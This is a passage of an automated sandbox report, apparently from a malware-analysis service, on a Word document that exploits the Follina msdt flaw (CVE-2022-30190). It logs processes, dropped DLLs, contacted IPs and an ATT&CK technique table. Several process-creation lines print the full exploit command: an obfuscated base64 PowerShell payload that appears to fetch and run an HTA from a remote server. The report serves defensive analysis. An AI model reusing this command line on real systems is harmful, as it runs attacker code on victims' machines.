        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xppvbwul\xppvbwul.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\s0ida0bj\s0ida0bj.dllJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\hfyslwgs\hfyslwgs.dllJump to dropped file
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 973Jump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeWindow / User API: threadDelayed 416Jump to behavior
        Source: mshta.exe, 00000019.00000002.559412436.0000000000A46000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdClass0
        Source: mshta.exe, 00000019.00000002.559370717.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000019.00000002.559502075.0000000000A81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556934937.0000000002E27000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001E.00000002.556713488.0000000002DDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
        Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'bQBzAGgAdABhACAAaAB0AHQAcAA6AC8ALwAxADUAOQAuADcANQAuADEAMwA1AC4AMQA2ADIAOgA2ADEAMgA1ADYALwBkAGwAbABoAG8AcwB0AC4AaAB0AGEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5C8A.tmp" "c:\Users\user\AppData\Local\Temp\s0ida0bj\CSCC025FCB9965F4BC3896D6CAE016378F.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5BB.tmp" "c:\Users\user\AppData\Local\Temp\hfyslwgs\CSCD4B89031A8FB43F8B14D4D9332D5938.TMP"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES55EE.tmp" "c:\Users\user\AppData\Local\Temp\xppvbwul\CSC578DA5B3682742E2AA363EADA4BD665D.TMP"Jump to behavior
        Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: rundll32.exe, 0000001E.00000002.557302079.0000000003380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXEQueries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\msdt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 0000001E.00000002.556428060.0000000002CE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts1
        Command and Scripting Interpreter
        1
        DLL Side-Loading
        12
        Process Injection
        11
        Masquerading
        OS Credential Dumping1
        Query Registry
        Remote Services1
        Email Collection
        Exfiltration Over Other Network Medium11
        Non-Standard Port
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default Accounts22
        Exploitation for Client Execution
        Boot or Logon Initialization Scripts1
        DLL Side-Loading
        12
        Process Injection
        LSASS Memory1
        Security Software Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Ingress Tool Transfer
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)1
        Extra Window Memory Injection
        1
        Rundll32
        Security Account Manager1
        Process Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
        DLL Side-Loading
        NTDS1
        Application Window Discovery
        Distributed Component Object ModelInput CaptureScheduled Transfer111
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Extra Window Memory Injection
        LSA Secrets1
        Remote System Discovery
        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
        File and Directory Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync14
        System Information Discovery
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 647003 Sample: V3g2Pfu707.docx Startdate: 16/06/2022 Architecture: WINDOWS Score: 92 53 Malicious sample detected (through community Yara rule) 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->57 59 6 other signatures 2->59 6 WINWORD.EXE 296 62 2->6         started        10 csc.exe 3 2->10         started        12 csc.exe 3 2->12         started        14 3 other processes 2->14 process3 dnsIp4 47 101.33.231.81, 49746, 49747, 49748 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 6->47 33 C:\Users\user\AppData\...\V3g2Pfu707.docx.LNK, MS 6->33 dropped 35 C:\Users\user\AppData\...\exploit[1].htm, HTML 6->35 dropped 37 C:\Users\user\AppData\Local\...\BE8733D.htm, HTML 6->37 dropped 39 C:\Users\user\AppData\Local\...\164F6553.htm, HTML 6->39 dropped 16 msdt.exe 21 6->16         started        19 MSOSYNC.EXE 5 12 6->19         started        41 C:\Users\user\AppData\Local\...\xppvbwul.dll, PE32 10->41 dropped 21 cvtres.exe 1 10->21         started        43 C:\Users\user\AppData\Local\...\s0ida0bj.dll, PE32 12->43 dropped 23 cvtres.exe 1 12->23         started        49 159.75.135.162, 49781, 61256 TELE2EU China 14->49 51 192.168.2.1 unknown unknown 14->51 45 C:\Users\user\AppData\Local\...\hfyslwgs.dll, PE32 14->45 dropped 25 cvtres.exe 1 14->25         started        27 rundll32.exe 14->27         started        file5 process6 file7 29 C:\Windows\Temp\...\DiagPackage.dll.mui, PE32 16->29 dropped 31 C:\Windows\Temp\...\DiagPackage.dll, PE32+ 16->31 dropped

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        V3g2Pfu707.docx34%VirustotalBrowse
        V3g2Pfu707.docx29%ReversingLabsDocument-Word.Exploit.CVE-2017-0199
        SourceDetectionScannerLabelLink
        C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dll0%MetadefenderBrowse
        C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\DiagPackage.dll0%ReversingLabs
        C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.mui0%MetadefenderBrowse
        C:\Windows\Temp\SDIAG_4d4ccb62-1300-4c5f-92dc-0e3b25814c25\en-US\DiagPackage.dll.mui0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://roaming.edog.0%URL Reputationsafe
        https://cdn.entity.0%URL Reputationsafe
        https://powerlift.acompli.net0%URL Reputationsafe
        https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
        https://cortana.ai0%URL Reputationsafe
        https://api.aadrm.com/0%URL Reputationsafe
        https://ofcrecsvcapi-int.azurewebsites.net/0%URL Reputationsafe
        http://106.55.17.200/jquery-3.3.1.slim.min.js0%Avira URL Cloudsafe
